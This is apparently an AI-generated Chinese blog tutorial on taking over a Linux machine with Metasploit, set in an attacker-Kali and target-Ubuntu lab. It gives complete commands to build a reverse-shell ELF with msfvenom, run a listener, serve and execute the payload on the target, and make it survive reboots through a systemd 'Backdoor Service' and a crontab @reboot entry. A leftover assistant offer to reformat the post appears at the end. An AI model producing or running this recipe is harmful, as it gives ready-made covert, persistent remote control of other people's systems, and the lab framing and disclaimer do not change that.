Kali Linux 木马渗透实战

Kali Linux 木马渗透实战：生成、监听、植入与自动持久化控制
前言
在网络安全与渗透测试学习中，木马远控是最基础也最核心的攻击手法之一。本文基于 Kali Linux 自带的 Metasploit 框架，完整复现木马生成 → 监听上线 → 目标植入 → 自动复活持久化全流程，实验环境为 Kali 攻击机与 Ubuntu 目标机，仅用于安全学习与授权测试，严禁非法入侵。
一、实验环境与工具说明
攻击机：Kali Linux（自带 MSF 渗透框架）
目标机：Ubuntu 系统
核心工具：msfvenom（木马生成）、msfconsole（监听控制）、Apache（文件下载）
通信方式：反向 TCP 连接，目标机主动回连攻击机
二、步骤一：使用 MSFVenom 生成 Linux 木马
MSFVenom 是 Metasploit 专用 payload 生成器，可直接生成对应系统架构的远控程序。
执行生成命令：
msfvenom -p linux/x64/shell/reverse_tcp LHOST=攻击机Kali_IP LPORT=9999 -f elf -o shell.elf
参数说明：
-p：指定 payload 为 Linux 64位反向 Shell
LHOST：填写攻击机 Kali 本机 IP
LPORT：自定义监听端口（本文使用 9999）
-f elf：指定输出格式为 Linux 可执行文件
-o shell.elf：输出文件名为 shell.elf
三、步骤二：启动 MSF 监听程序
在 Kali 中打开 MSF 控制台，配置与木马一致的监听参数。
msfconsole
use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
set lhost Kali_IP
set lport 9999
run
执行 run 后进入监听状态，等待目标机运行木马后自动回连。
四、步骤三：木马植入与目标机执行

1. Kali 开启 Apache 提供下载服务
   将生成的木马移动到 Web 目录，启动 Apache 让目标机下载：
   mv shell.elf /var/www/html
   service apache2 start
2. Ubuntu 目标机下载木马
   通过 SSH 登录目标机，使用 wget 下载木马：
   wget http://Kali_IP/shell.elf
3. 赋予执行权限并运行
   直接执行会提示权限不足，先添加执行权限再运行：
   chmod +x shell.elf
   ./shell.elf
   运行成功后，Kali 监听端将立即收到反弹 Shell，获得目标机控制权。
   五、核心优化：木马自动复活（持久化控制）
   普通木马一旦进程被杀或服务器重启，就会失去控制。通过系统服务自启实现自动复活，保证重启/崩溃后依然上线。
   使用 systemd 实现稳定持久化
   在目标机创建系统服务文件：
   nano /etc/systemd/system/shell.service
   写入以下配置（实现崩溃自动重启+开机自启）：
   [Unit]
   Description=Backdoor Service
   After=network.target

[Service]
Type=simple
ExecStart=/root/shell.elf
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target
加载服务并设置开机自启：
systemctl daemon-reload
systemctl enable shell
systemctl start shell
效果：
木马意外退出 → 5 秒后自动重启
服务器重启 → 开机自动运行木马
攻击机保持监听即可长期控制目标机
备用方案：crontab 定时任务兜底
(crontab -l; echo "@reboot /root/shell.elf &") | crontab -
六、总结与安全警示
本文完整演示了 Linux 平台下基于 MSF 的木马攻击三步骤：制作木马 → 启动监听 → 植入运行，并通过 systemd 实现了关键的自动复活持久化，是渗透测试中最常用的远控留存手法。
⚠️ 重要声明：
本文内容仅用于网络安全学习、授权渗透测试与服务器安全加固，未经授权擅自控制他人计算机属于违法行为，一切后果由操作者自行承担。
需要我帮你把这篇博客改成更简洁的课堂笔记版或带排版的 Markdown 发布版吗？
注意本篇由ai生成😊